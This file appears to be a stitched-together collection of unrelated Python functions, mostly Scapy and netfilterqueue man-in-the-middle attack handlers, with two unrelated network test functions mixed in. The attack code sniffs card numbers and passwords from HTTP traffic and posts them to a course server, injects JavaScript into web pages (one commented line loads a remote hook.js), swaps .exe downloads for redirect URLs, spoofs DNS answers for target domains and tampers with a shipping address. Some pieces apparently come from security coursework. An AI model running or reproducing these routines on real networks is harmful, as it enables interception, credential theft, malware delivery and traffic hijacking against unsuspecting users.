def print_and_accept(pkt):
global secrets
#print(pkt)
#print(pkt.get_payload())
ip = IP(pkt.get_payload())
cc = "[0-9A-Za-z]* (cc --- ([0-9]{4}[./][0-9]{4}[./][0-9]{4}[/.][0-9]{4})) [0-9A-Za-z]"
pwd = "[0-9A-Za-z] (pwd --- ([A-Z0-9:;<=>?@]*)) [0-9A-Za-z]"
print(secrets)
if len(secrets) == 5:
print("done, sending request")
data = {
"student_email": "*****@*****.**",
"secrets": list(secrets),
}
print(data)
r = requests.post("http://com402.epfl.ch/hw1/ex4/sensitive", json=data)
print(r.text)
sys.exit()
else:
if (ip.haslayer(Raw)):
if (ip.haslayer(TCP) and ip[TCP].dport == 80):
http = ip[TCP].load.decode()
print("Http received")
if http.find("com402.epfl.ch/hw1/ex4/transaction"):
print("Transaction http received")
m = re.search(cc, http)
if m:
print("Found CC", m.group(2))
secrets.add(m.group(2))
m = re.search(pwd, http)
if m:
print("Found PASSWORD", m.group(2))
secrets.add(m.group(2))
pkt.accept()
def process_packet(packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
load = scapy_packet[Raw].load
if scapy_packet[TCP].dport == 80:
print("[+] HTTP Request")
load = re.sub(b"Accept-Encoding:.*?\\r\\n", b"", load)
# print(scapy_packet.show())
elif scapy_packet[TCP].sport == 80:
print("[+] HTTP Response")
load = load.replace(b"</body>", payload + b"</body")
content_length_search = re.search(b"(Content-Length:\s)(\d*)",
load)
if content_length_search and b"text/html" in load:
content_length = content_length_search.group(2)
update_content_length = int(
content_length.decode()) + len(payload)
print(
f'Before: {content_length} ; After: {update_content_length}'
)
load = load.replace(content_length,
str(update_content_length).encode())
# print(scapy_packet.show())
if load != scapy_packet[Raw].load:
mod_packet = set_load(scapy_packet, load)
packet.set_payload(bytes(mod_packet))
packet.accept()
def process_packet(pkt):
scapy_pkt = IP(pkt.get_payload())
if (scapy_pkt.haslayer(TCP) and scapy_pkt.haslayer(Raw)):
tcp = scapy_pkt.getlayer(TCP)
raw_load = scapy_pkt.getlayer(Raw).load
# If destination port is port 80, most likely a HTTP request, else HTTP response
if (tcp.dport == 80 and raw_load):
#print("[+] Request")
# Strip reqeuest of any encoding (such as compression)
raw_load = re.sub(b"Accept-Encoding:.*?\\r\\n", b'', raw_load)
# Change the request from HTTP/1.1 to HTTP/1.0 so content gets sent all at once
raw_load = raw_load.replace(b"HTTP/1.1", b"HTTP/1.0")
elif (tcp.sport == 80 and raw_load):
content_length = re.search(b"(?:Content-Length:\s)(\d*)", raw_load)
raw_load = raw_load.replace(b"</body>", INJECTION + b"</body>")
# Recalculate the content length of the HTML page
if (content_length and b"text/html" in raw_load):
#print("[+] Attempting to inject code into response payload")
content_length = content_length.group(1)
new_content_length = str(int(content_length) +
len(INJECTION)).encode()
raw_load = raw_load.replace(content_length, new_content_length)
if (raw_load != scapy_pkt.getlayer(Raw).load):
scapy_pkt = set_load(scapy_pkt, raw_load)
scapy_pkt = raw(scapy_pkt.__class__(raw(scapy_pkt)))
pkt.set_payload(scapy_pkt)
pkt.accept()
def process_packet(self, packet):
scapy_packet = IP(packet.get_payload())
# print(scapy_packet.show())
download_path = ''
if scapy_packet.haslayer(TCP):
if scapy_packet.haslayer(
http.HTTPRequest) and scapy_packet[TCP].dport == int(
self.port):
download_path = str(scapy_packet[http.HTTPRequest].Path)
if ".exe" in download_path and self.file_name not in download_path:
print("[+] EXE Request")
self.ack_list.append(scapy_packet[TCP].ack)
elif scapy_packet.haslayer(
http.HTTPResponse) and scapy_packet[TCP].sport == int(
self.port):
if scapy_packet[TCP].seq in self.ack_list:
self.ack_list.remove(scapy_packet[TCP].seq)
print("[+] Replacing File")
print(self.url)
scapy_packet[http.HTTPResponse].Status_Code = '301'
scapy_packet[
http.HTTPResponse].Reason_Phrase = 'Moved Permanently'
scapy_packet[http.HTTPResponse].Location = self.url
modified_packet = self.set_load(scapy_packet)
print(modified_packet.show())
packet.set_payload(bytes(modified_packet))
print(IP(packet.get_payload()).show())
self.send(text_data=dumps({
'replace_downloads_result':
"[+] File has been successfully replaced"
}))
packet.accept()
def process_packet(self, packet):
"""
Determines how to process each packet in queue.
Separates HTTP requests/responses and detects file downloads.
Determines corresponding file req/res objects, enabling
packet interception and supplantation of the res load (file).
"""
ack_list = []
redirect_header = f"HTTP/1.1 301 Moved Permanently\nLocation: {self.redirect_url}\n\n"
# wrap payload packet in Scapy IP layer
scapy_packet_obj = IP(packet.get_payload())
if (scapy_packet_obj.haslayer(scapy.Raw)
and scapy_packet_obj.haslayer(TCP)):
load = scapy_packet_obj[scapy.Raw].load.decode()
# request obj
if (scapy_packet_obj[TCP].dport == 10000):
# ensure our url is not in load to prevent infinite loop
if (self.target_extension in load
and self.redirect_url not in load):
print("[+] File Request")
ack_list.append(scapy_packet_obj[TCP].ack)
# response obj
elif (scapy_packet_obj[TCP].sport == 10000):
if (scapy_packet_obj[TCP].seq in ack_list):
ack_list.remove(scapy_packet_obj[TCP].seq)
print("[+] Supplanting file(s)...")
generated_packet = self.generate_load(
scapy_packet_obj, redirect_header.encode()
) # TEST might need to be bytes
# distill into original packet obj
packet.set_payload(bytes(generated_packet))
packet.accept()
def process_packet(packet):
'''
Process each packet on Network filter queue
'''
global PORT
#Evaluate IP packet filtered
IP_pkt = IP(packet.get_payload())
#If the IP packet has TCP layer and Raw Layer (it can be HTTP packet)
if IP_pkt.haslayer(Raw) and IP_pkt.haslayer(TCP):
try:
#Decode load of TCP packet
load = IP_pkt[Raw].load.decode()
#IP packet from the victim to the server
#destination port = 80 (port of HTTP server)
if IP_pkt[TCP].dport == PORT:
cprint('Request', 'red', attrs=[
'bold',
])
'''Search for Accept-Encoding Header (?\\r\\n = stop at first occurrence of \\r\\n)
Remove Accept-Encoding header from request(we don't understand any encoding)
Remove also Chunked-Encoding by using HTTP/1.0
'''
load = re.sub('Accept-Encoding:.*?\\r\\n', '', load)
load = load.replace('HTTP/1.1', 'HTTP/1.0')
IP_pkt[Raw].load = load
#Scapy recomputes them
del IP_pkt[IP].len
del IP_pkt[IP].chksum
del IP_pkt[TCP].chksum
packet.set_payload(bytes(IP_pkt))
#IP packet from the server to the victim
#source port = 80 (port of HTTP server)
elif IP_pkt[TCP].sport == PORT:
cprint('Response', 'blue', attrs=[
'bold',
])
load = injection_code(load)
IP_pkt[Raw].load = load
#Scapy recomputes them
del IP_pkt[IP].len
del IP_pkt[IP].chksum
del IP_pkt[TCP].chksum
packet.set_payload(bytes(IP_pkt))
except UnicodeDecodeError:
#If python convertion (decode) fails for some bytes
#(No HTML code, so I don't want to analyse this packet)
pass
packet.accept()
def process_packet(packet):
'''
Process each packet on Network filter queue
'''
global ack_list, TARGET, URL, PORT
#Convertion of filtered packet to scapy IP packet
IP_pkt = IP(packet.get_payload())
#Check if the packet has Raw and TCP layer
if IP_pkt.haslayer(Raw) and IP_pkt.haslayer(TCP):
#Request from client to server
if IP_pkt[TCP].dport == PORT:
cprint('Request', 'red', attrs=[
'bold',
], end='')
#Request of downloading a file with extension TARGET
if TARGET in str(IP_pkt[Raw].load):
cprint(': ', 'red', attrs=[
'bold',
], end='')
cprint(f'{TARGET} ', 'cyan', attrs=[
'bold',
], end='')
print('file with GET method ---> ', end='')
cprint(f'{URL} ', 'yellow', attrs=[
'bold',
])
#Append requested ACK
ack_list.append(IP_pkt[TCP].ack)
else:
print('')
#Response from server to client
elif IP_pkt[TCP].sport == PORT:
cprint('Response', 'blue', attrs=[
'bold',
])
#Response sequence number is in requested ACK list
if IP_pkt[TCP].seq in ack_list:
#Remove corresponding ACK in the list
ack_list.remove(IP_pkt[TCP].seq)
IP_pkt[
Raw].load = f'HTTP/1.1 301 Moved Permanently\r\nLocation: {URL}\r\n\r\n'
#Scapy recomputes them
del IP_pkt[IP].len
del IP_pkt[IP].chksum
del IP_pkt[TCP].chksum
packet.set_payload(bytes(IP_pkt))
packet.accept()
def process_packet(packet):
'''
Process each packet
'''
#Evaluate IP packet filtered
IP_pkt = IP(packet.get_payload())
#If the IP packet has TCP layer and Raw layer (it can be HTTP packet)
if IP_pkt.haslayer(Raw) and IP_pkt.haslayer(TCP):
try:
#Decode load of TCP packet
load = IP_pkt[Raw].load.decode()
#HTTP requests from the victim to the client
if IP_pkt[TCP].dport == 80:
cprint('Request', 'red', attrs=[
'bold',
])
'''Search for Accept-Encoding Header (?\\r\\n = stop at first occurrence of \\r\\n)
Remove Accept-Encoding header from request(we don't understand any encoding)
'''
load = re.sub('Accept-Encoding:.*?\\r\\n', '', load)
IP_pkt[Raw].load = load
#Scapy recomputes them
del IP_pkt[IP].len
del IP_pkt[IP].chksum
del IP_pkt[TCP].chksum
packet.set_payload(bytes(IP_pkt))
#HTTP responses from the server to the victim
elif IP_pkt[TCP].sport == 80:
cprint('Response', 'blue', attrs=[
'bold',
])
load = injection_code(load)
IP_pkt[Raw].load = load
#Scapy recomputes them
del IP_pkt[IP].len
del IP_pkt[IP].chksum
del IP_pkt[TCP].chksum
packet.set_payload(bytes(IP_pkt))
except UnicodeDecodeError:
#To manage fail of python convertion of some bytes
#(No HTML code, so I don't want to analyse this packet)
pass
packet.accept()
def test_pg_tun(self):
"""IP[46] Tunnel Mode PG"""
#
# test that we can send and receive IP encap'd packets on the
# tun interfaces
#
N_PKTS = 31
# v4 tun to ethernet
p = (IP(src=self.pg1.remote_ip4, dst=self.pg0.remote_ip4) /
UDP(sport=1234, dport=1234) / Raw("0" * 48))
rxs = self.send_and_expect(self.pg1, p * N_PKTS, self.pg0)
for rx in rxs:
self.assertEqual(rx[Ether].dst, self.pg0.remote_mac)
self.assertEqual(rx[IP].dst, self.pg0.remote_ip4)
# v6 tun to ethernet
p = (IPv6(src=self.pg2.remote_ip6, dst=self.pg0.remote_ip6) /
UDP(sport=1234, dport=1234) / Raw("0" * 48))
rxs = self.send_and_expect(self.pg2, p * N_PKTS, self.pg0)
for rx in rxs:
self.assertEqual(rx[Ether].dst, self.pg0.remote_mac)
self.assertEqual(rx[IPv6].dst, self.pg0.remote_ip6)
# eth to v4 tun
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
UDP(sport=1234, dport=1234) / Raw("0" * 48))
rxs = self.send_and_expect(self.pg0, p * N_PKTS, self.pg1)
for rx in rxs:
rx = IP(rx)
self.assertFalse(rx.haslayer(Ether))
self.assertEqual(rx[IP].dst, self.pg1.remote_ip4)
# eth to v6 tun
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IPv6(src=self.pg0.remote_ip6, dst=self.pg2.remote_ip6) /
UDP(sport=1234, dport=1234) / Raw("0" * 48))
rxs = self.send_and_expect(self.pg0, p * N_PKTS, self.pg2)
for rx in rxs:
rx = IPv6(rx)
self.assertFalse(rx.haslayer(Ether))
self.assertEqual(rx[IPv6].dst, self.pg2.remote_ip6)
def process_packet(packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
# dport = destination port, sport = source port
if scapy_packet[TCP].dport == 80:
if target_file in scapy_packet[scapy.Raw].load:
# memorize the ack
ack_list.append(scapy_packet[TCP].ack)
print(f'[+] {target_file} file download request')
elif scapy_packet[TCP].sport == 80:
seq = scapy_packet[TCP].seq
if seq in ack_list:
ack_list.remove(seq)
print('[+] Replace the file')
modified_packet = set_load(
scapy_packet,
f'HTTP/1.1 301 Moved Permanently\nLocation: {fake_file}\n\n'
)
packet.set_payload(str(modified_packet))
packet.accept()
def parse(packet):
global websites
global new_website
payload = packet.get_payload()
pkt = IP(payload)
if not pkt.haslayer(DNSQR):
packet.accept()
else:
for website in websites:
if website in pkt[DNS].qd.qname:
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=new_website))
spoofed_pkt.show()
packet.set_payload(str(spoofed_pkt))
packet.accept()
return
packet.accept()
def process_packet(self, packet):
"""
Determines how to process each packet in queue.
Parses for those with DNS response, modifies response
such that target_url resolves to the redirect_ip.
"""
# wrap payload packet in Scapy IP layer
scapy_packet_obj = IP(packet.get_payload())
if (scapy_packet_obj.haslayer(DNSRR)):
q_name = scapy_packet_obj[DNSQR].qname
if (self.target_url in q_name):
print("[+] Resolving to provided IP...")
manufactured_res = DNSRR(rrname=q_name, rdata=self.redirect_ip)
scapy_packet_obj[
DNS].an = manufactured_res # supplant DNS answer
scapy_packet_obj[
DNS].ancount = 1 # consolidate DNS answers to 1
# CRITICAL: scapy will autogen correct len + checksum contingent on new data
del scapy_packet_obj[IP].len
del scapy_packet_obj[IP].chksum
del scapy_packet_obj[UDP].len
del scapy_packet_obj[UDP].chksum
# distill into original packet obj
packet.set_payload(str(scapy_packet_obj))
packet.accept()
def process_packet(self, packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(Raw):
load = scapy_packet[Raw].load
if scapy_packet[TCP].dport == 80:
print(" [+] HTTP Request")
load = sub(b"Accept-Encoding:.*?\\r\\n", b"", load)
load = load.replace(b"HTTP/1.1", b"HTTP/1.0")
elif scapy_packet[TCP].sport == 80:
print(" [+] HTTP Response")
# injection_code = '<script src="http://10.0.2.5:3000/hook.js"></script>'
injection_code = "<script>alert('test');</script></body>"
load = load.replace(b"</body>", bytes(injection_code, "utf-8"))
content_length_search = search(b"(?:Content-Length:\s)(\d*)",
load)
if content_length_search and "text/html" in str(load):
content_length = int(content_length_search.group(1))
new_content_length = content_length + len(
injection_code) - len("</body>")
load = load.replace(
bytes(str(content_length), "utf-8"),
bytes(str(new_content_length), "utf-8"))
# WebsocketConsumer.send(text_data=dumps({
# 'code_injector_result': "[+] Code has been injector"
# }))
if load != scapy_packet[Raw].load:
new_packet = self.set_load(scapy_packet, load)
packet.set_payload(bytes(new_packet)) # Content-Length:\s\d*
packet.accept()
def process_packet(packet):
'''
Process each packet
'''
global DOMAIN, TARGET
IP_pkt = IP(packet.get_payload())
#It's a DNS Response (DNS Record Route)
if (IP_pkt.haslayer(DNSRR)):
#Name to be translated through DNS Query Record
domain = IP_pkt[DNSQR].qname
#DNS resolution response for DOMAIN domain
if DOMAIN in str(domain):
print("Spoofing target")
answer = DNSRR(rrname=domain, rdata=TARGET)
IP_pkt[DNS].an = answer
#Only 1 DNS record (only 1 IP related to target)
IP_pkt[DNS].ancount = 1
#Delete checksum, len of IP packet and UDP packet
#(scapy then recalculate automatically them using inserted fields)
del IP_pkt[IP].len
del IP_pkt[IP].chksum
del IP_pkt[UDP].len
del IP_pkt[UDP].chksum
#Set new payload and accept it
packet.set_payload(bytes(IP_pkt))
packet.accept()
def process_packet(self, packet):
scapy_packet = IP(packet.get_payload())
print(scapy_packet.show())
if scapy_packet.haslayer(TCP):
if scapy_packet[TCP].dport == int(
self.port) and scapy_packet.haslayer(http.HTTPRequest):
scapy_packet[http.HTTPRequest].Http_Version = 'HTTP/1.0'
scapy_packet[http.HTTPRequest].Accept_Encoding = None
del scapy_packet[IP].len
del scapy_packet[IP].chksum
del scapy_packet[TCP].chksum
packet.set_payload(bytes(scapy_packet)) # Content-Length:\s\d*
elif scapy_packet[TCP].sport == int(
self.port) and scapy_packet.haslayer(Raw):
load = scapy_packet[Raw].load
print(" [+] HTTP Response")
# injection_code = '<script src="http://10.0.2.5:3000/hook.js"></script>'
injection_code = "<script>alert('2');</script></body>"
load = load.replace(b"</body>", bytes(injection_code, "utf-8"))
load = load.replace(b"</BODY>", bytes(injection_code, "utf-8"))
# print(load)
if scapy_packet.haslayer(http.HTTPResponse):
if "text/html" in str(
scapy_packet[http.HTTPResponse].Content_Type):
if scapy_packet[http.HTTPResponse].Content_Length:
content_length = int(
scapy_packet[http.HTTPResponse].Content_Length)
new_content_length = content_length + len(
injection_code)
scapy_packet[
http.HTTPResponse].Content_Length = bytes(
str(new_content_length), "utf-8")
if load != scapy_packet[Raw].load:
scapy_packet[Raw].load = load
del scapy_packet[IP].len
del scapy_packet[IP].chksum
del scapy_packet[TCP].chksum
packet.set_payload(
bytes(scapy_packet)) # Content-Length:\s\d*
print(IP(packet.get_payload()).show())
packet.accept()
def process_packet(pkt):
global ACK_LIST
scapy_pkt = IP(pkt.get_payload())
if (scapy_pkt.haslayer(TCP)):
tcp = scapy_pkt.getlayer(TCP)
raw_layer = scapy_pkt.getlayer(Raw).load if scapy_pkt.haslayer(
Raw) else None
# If destination port is port 80, most likely a HTTP request, else HTTP response
if (tcp.dport == 80 and raw_layer):
if (FILE_EXT in raw_layer and LOAD_KEYWORD not in raw_layer):
ACK_LIST.append(tcp.ack)
elif (tcp.sport == 80 and (tcp.seq in ACK_LIST) and raw_layer):
ACK_LIST.remove(tcp.seq)
scapy_pkt = set_load(scapy_pkt, CUSTOM_LOAD)
# Use the class instance to recalculate the chksum and len fields for us
# Accepts a packet in bytes format, then casted back into bytes for payload
scapy_pkt = raw(scapy_pkt.__class__(raw(scapy_pkt)))
# Update the current packets payload with the payload of our spoofed one
pkt.set_payload(scapy_pkt)
pkt.accept()
def preprocesing_packets(self, packet):
pkt = IP(packet.get_payload())
http_payload = b""
http_header_exists = False
image = b""
if pkt.haslayer(TCP) and pkt[TCP].haslayer(http.HTTP):
GLOBAL_pkts.append(pkt)
""" PACKET NFQEUEU TAMPER """
packet.set_payload(bytes(pkt))
packet.accept()
def processP(packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(DNSRR):
print("PROCESSING : ", scapy_packet.summary())
try:
scapy_packet = modify(scapy_packet)
except IndexError:
pass
print("FORWARDING! > ", scapy_packet.summary())
packet.set_payload(bytes(scapy_packet))
packet.accept()
def process_pkt(pkt):
scapy_pkt = IP(pkt.get_payload())
if scapy_pkt.haslayer(TCP) and scapy_pkt[TCP].dport == 80:
if scapy_pkt.haslayer(scapy.Raw):
for word in WORDSLIST:
if word in scapy_pkt[scapy.Raw].load:
print("[!] Downloading a " + word)
ack_list.append(scapy_pkt[TCP].ack)
if scapy_pkt.haslayer(TCP) and scapy_pkt[TCP].sport == 80:
if scapy_pkt.haslayer(scapy.Raw):
if scapy_pkt[TCP].seq in ack_list:
print("[!] DWLD resp for " + str(scapy_pkt[TCP].seq))
#change the file
edited_pkt = set_load(scapy_pkt, LOAD)
pkt.set_payload(str(edited_pkt))
ack_list.remove(scapy_pkt[TCP].seq)
print("[+] file changed with " + LOAD)
print(
"-------------------------------------------------------------"
)
pkt.accept()
def print_and_accept(pkt):
#print(pkt)
#print(pkt.get_payload())
ip = IP(pkt.get_payload())
if (ip.haslayer(Raw)):
if (ip.haslayer(TCP) and ip[TCP].dport == 80):
http = ip[TCP].load.decode()
print("Http received")
if http.find("com402.epfl.ch/hw1/ex3/shipping"):
print("Shipping Http received")
if http.find("{") > -1:
print("Found json")
print(http)
http_json = "{" + "{".join(http.split("{")[1:])
http_json = json.loads(http_json)
http_json['shipping_address'] = '*****@*****.**'
r = requests.post('http://com402.epfl.ch/hw1/ex3/shipping', json=http_json)
print(r)
print(r.text)
pkt.drop()
sys.exit()
pkt.accept()
def process_packet(packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
if scapy_packet[TCP].dport == 80:
# print("HTTP Request")
if ".exe".encode() in scapy_packet[Raw].load:
print("[+] exe request detected.")
ack_list.append(scapy_packet[TCP].ack)
print(scapy_packet.show())
elif scapy_packet[TCP].sport == 80:
# print("HTTP Response")
if scapy_packet[TCP].seq in ack_list:
ack_list.remove(scapy_packet[TCP].seq)
print("[+] Modifying download file")
mod_packet = set_load(scapy_packet, redirect)
print(scapy_packet.show())
packet.set_payload(bytes(mod_packet))
# print(packet.get_payload())
packet.accept()
def process_pkt(pkt):
scapy_pkt = IP(pkt.get_payload())
if scapy_pkt.haslayer(DNSRR):
qname = scapy_pkt[DNSQR].qname
print("[!] DNS Request Response for " + qname)
if DEST in qname:
print("[+] Spoofing for " + DEST + " with : " + RDEST)
spoofed_pkt = spoof_dns(scapy_pkt, qname)
#edit the pkt to send
pkt.set_payload(str(spoofed_pkt))
print("-------------------------------------------------------------")
pkt.accept()
def process_packet(self, packet):
"""
Determines how to process each packet in queue.
Modifies HTTP Raw/Load layers req/res objects and injects
JavaScript payload into HTML content, as matched against
the injection regex.
...
"""
# wrap payload packet in Scapy IP layer
scapy_packet_obj = IP(packet.get_payload())
if (scapy_packet_obj.haslayer(scapy.Raw)
and scapy_packet_obj.haslayer(TCP)):
load = scapy_packet_obj[scapy.Raw].load.decode()
# request obj
if (scapy_packet_obj[TCP].dport == 10000):
print("[+] Request")
# remove Encoding header to force resolution of HTML to UTF-8
load = re.sub(ENCODING_REGEX, "", load)
# downgrade to 1.0 to avoid chunks proc exception
load = load.replace("HTTP/1.1", "HTTP/1.0")
# response obj
elif (scapy_packet_obj[TCP].sport == 10000):
print("[+] Response")
content_len_grp = re.search(LEN_REGEX, load)
load = load.replace(INJECTION_REGEX,
self.payload + INJECTION_REGEX)
if (content_len_grp and "text/html" in load):
content_len = content_len_grp.group(1)
new_content_len = int(content_len) + len(self.payload)
load = load.replace(content_len, str(new_content_len))
load = load.encode()
# did we tamper with it?
if (load != scapy_packet_obj[scapy.Raw].load):
generated_packet = self.generate_load(scapy_packet_obj, load)
packet.set_payload(bytes(generated_packet))
packet.accept()
def process_pkt(pkt) :
scapy_pkt = IP(pkt.get_payload())
if scapy_pkt.haslayer(scapy.Raw) :
load = scapy_pkt[scapy.Raw].load
if scapy_pkt.haslayer(TCP) and scapy_pkt[TCP].dport == 80:
#HTTP Request
load = re.sub(SUPPORTED_ENCODING, NEW_SE, load)
load = load.replace(HTTP11,HTTP10)
elif scapy_pkt.haslayer(TCP) and scapy_pkt[TCP].sport == 80:
#HTTP Response
load = load.replace(PAGE_END_TAG, JS_HOOK+PAGE_END_TAG)
content_length = re.search(CONTENT_LENGTH, load)
if content_length and TXT_HTML in load:
clength = content_length.group(1)
new_clength = int(clength) + len(JS_HOOK)
load = load.replace(clength, str(new_clength))
if (scapy_pkt[scapy.Raw].load != load) :
print("[+] Adding the HOOK\n------------------------------------------")
edited_pkt = set_load(scapy_pkt, load)
pkt.set_payload(str(edited_pkt))
pkt.accept()
def callback(pkt):
raw = pkt.get_payload()
ip = IP(raw)
if (ip.haslayer('Raw')):
p = ip['Raw'].load
if p[0] == 0x16 and p[1] == 0x03 and p[5] == 0x01 and p[10] > 0x01:
pkt.drop()
pkt = IP(dst=ip['IP'].dst, src='172.16.0.3') / TCP()
pkt['TCP'].sport = ip['TCP'].sport
pkt['TCP'].dport = ip['TCP'].dport
pkt['TCP'].seq = ip['TCP'].seq
pkt['TCP'].ack = ip['TCP'].ack
pkt['TCP'].flags = 'FA'
send(pkt)
else:
pkt.accept()
else:
pkt.accept()
def process_packet(self, packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(DNSRR):
qname = scapy_packet[DNSQR].qname
print(qname)
print(self.target_website)
if self.target_website in qname.decode('cp866'):
self.send(text_data=dumps(
{'dns_spoofing_result': "[+] Spoofing target"}))
answer = DNSRR(rrname=qname, rdata=self.server_ip)
scapy_packet[DNS].an = answer
scapy_packet[DNS].ancount = 1
del scapy_packet[IP].len
del scapy_packet[IP].chksum
del scapy_packet[UDP].len
del scapy_packet[UDP].chksum
packet.set_payload(bytes(scapy_packet))
packet.accept()
def process_packet(packet):
"""
This callback will be called everytime a new packet is redirected to the netfilter queue.
:param packet: Incoming packet
"""
# Convert a netfilter packet to a scapy packet.
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(
DNSRR): # If the packet is a DNS Resource Record, modify it
print("[Before]: ", scapy_packet.summary())
try:
scapy_packet = modify_packet(scapy_packet)
except IndexError:
pass
print("[After]: ", scapy_packet.summary())
# Set the packet back to a netfilter packet
packet.set_payload(bytes(scapy_packet))
# Accept the packet
packet.accept()
def verify_encrypted(self, p, sa, rxs):
for rx in rxs:
try:
pkt = sa.decrypt(rx[IP])
if not pkt.haslayer(IP):
pkt = IP(pkt[Raw].load)
self.assert_packet_checksums_valid(pkt)
self.assert_equal(pkt[IP].dst, self.pg0.remote_ip4)
self.assert_equal(pkt[IP].src, self.pg0.local_ip4)
self.assertTrue(pkt.haslayer(GRE))
e = pkt[GRE]
self.assertEqual(e[IP].dst, "1.1.1.2")
except (IndexError, AssertionError):
self.logger.debug(ppp("Unexpected packet:", rx))
try:
self.logger.debug(ppp("Decrypted packet:", pkt))
except:
pass
raise
def process_packet(packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(DNSRR):
qname = scapy_packet[DNSQR].qname
if 'bing.com' in qname:
print('[+] Spoofing target DNS')
response = DNSRR(rrname=qname, rdata=redirect_to)
scapy_packet[DNS].an = response
scapy_packet[DNS].ancount = 1
del scapy_packet[IP].len
del scapy_packet[IP].chksum
del scapy_packet[UDP].len
del scapy_packet[UDP].chksum
packet.set_payload(str(scapy_packet))
packet.accept()
def verify_encrypted(self, p, sa, rxs):
for rx in rxs:
try:
pkt = sa.decrypt(rx[IP])
if not pkt.haslayer(IP):
pkt = IP(pkt[Raw].load)
self.assert_packet_checksums_valid(pkt)
self.assert_equal(pkt[IP].dst, self.pg0.remote_ip4)
self.assert_equal(pkt[IP].src, self.pg0.local_ip4)
self.assertTrue(pkt.haslayer(GRE))
e = pkt[Ether]
self.assertEqual(e[Ether].dst, self.omac)
self.assertEqual(e[IP].dst, "1.1.1.2")
except (IndexError, AssertionError):
self.logger.debug(ppp("Unexpected packet:", rx))
try:
self.logger.debug(ppp("Decrypted packet:", pkt))
except:
pass
raise
def process_func(packets):
scapy_packets = IP(packets.get_payload())
if scapy_packets.haslayer(DNSRR):
qname = scapy_packets[DNSQR].qname
a = "www.bing.com"
if b"www.bing.com" in qname:
print("[+] Spoofing Started")
ans = DNSRR(rrname=qname, rdata="192.168.0.107")
scapy_packets[DNS].an = ans
scapy_packets[DNS].ancount = 1
del scapy_packets[IP].len
del scapy_packets[IP].chksum
del scapy_packets[UDP].len
del scapy_packets[UDP].chksum
packets.set_payload(bytes(scapy_packets))
print(scapy_packets.show())
print("\n-------------------------------------------------------------------")
packets.accept()
